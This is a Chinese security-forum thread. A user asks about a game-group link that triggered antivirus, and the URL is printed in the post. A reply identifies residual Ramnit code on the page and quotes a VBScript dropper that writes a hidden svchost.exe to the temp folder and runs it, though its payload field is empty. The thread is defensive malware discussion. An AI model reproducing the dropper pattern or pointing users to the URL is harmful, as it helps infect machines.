吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 2026|回复: 18
收起左侧

因受伤在家休养玩传奇,在一个群里有个人发个网址点了就报毒了

[复制链接]
lcg888 发表于 2022-8-26 20:50
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
谁有这版本http://www.777777777.net:6677/有的带价

你们一定要在有杀软的情况下打开此网址啊
你们一定要在有杀软的情况下打开此网址啊
你们一定要在有杀软的情况下打开此网址啊

在交流群里有人发这么一个网址,我好奇点击去看看吧。 结果火绒拦截了,第一次知道点击一个网址电脑还能中招。
此时此刻我在杀毒,我也不敢重启 因为我怕重启开不了机或者引起其他什么情况

上传不了图,有人给分析一下吗?

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

dsb2468 发表于 2022-8-29 14:18
算是误报了,这个网页后面有个残存的被杀软修复过的Ramnit代码,已经没有危害了

[Visual Basic] 纯文本查看 复制代码
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = 
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
 楼主| lcg888 发表于 2022-8-27 17:13
yljniubi666 发表于 2022-8-27 17:06
我擦,幸好开着火绒,不然就中了。我也是第一次见到这种病毒,有点好玩。

是啊,我也是互联网十来二十年第一次遇到电脑上打开网址就中招的。  我也是火绒拦截掉了,但是不放心的去查杀一下吧,结果C盘中招然后D盘中招59个文件中招  你也查杀一下吧
yljniubi666 发表于 2022-8-27 17:06
我擦,幸好开着火绒,不然就中了。我也是第一次见到这种病毒,有点好玩。
yljniubi666 发表于 2022-8-27 20:24
lcg888 发表于 2022-8-27 17:13
是啊,我也是互联网十来二十年第一次遇到电脑上打开网址就中招的。  我也是火绒拦截掉了,但是不放心的去 ...

我查了,没有中招。那些病毒应该是你之前就中了
 楼主| lcg888 发表于 2022-8-27 21:06
yljniubi666 发表于 2022-8-27 20:24
我查了,没有中招。那些病毒应该是你之前就中了

不是的不是的 我天天查毒,我说的59个中招的 都是跟拦截的病毒名称一模一样
yljniubi666 发表于 2022-8-28 19:05
lcg888 发表于 2022-8-27 21:06
不是的不是的 我天天查毒,我说的59个中招的 都是跟拦截的病毒名称一模一样

我又查了一遍,真没有。是不是你火绒没开全?我就只关了应用联网监控,其他都开了
 楼主| lcg888 发表于 2022-8-28 23:54
yljniubi666 发表于 2022-8-28 19:05
我又查了一遍,真没有。是不是你火绒没开全?我就只关了应用联网监控,其他都开了

没全开........................................  全开影响很多东西操作 所以没全开
 楼主| lcg888 发表于 2022-8-29 16:27
dsb2468 发表于 2022-8-29 14:18
算是误报了,这个网页后面有个残存的被杀软修复过的Ramnit代码,已经没有危害了

[mw_shl_code=vb,true][ ...

我说咋回事,这是人生中第一次遇到PC端点 就点击个网址就中招的。感觉很不可思议万分感谢 大佬的解答这下我就放心了。
Hack3rHan 发表于 2022-8-31 16:45
只要你浏览器版本不太老,绝大部分情况下点个网址还是不至于直接中招的。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-4-24 04:21

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表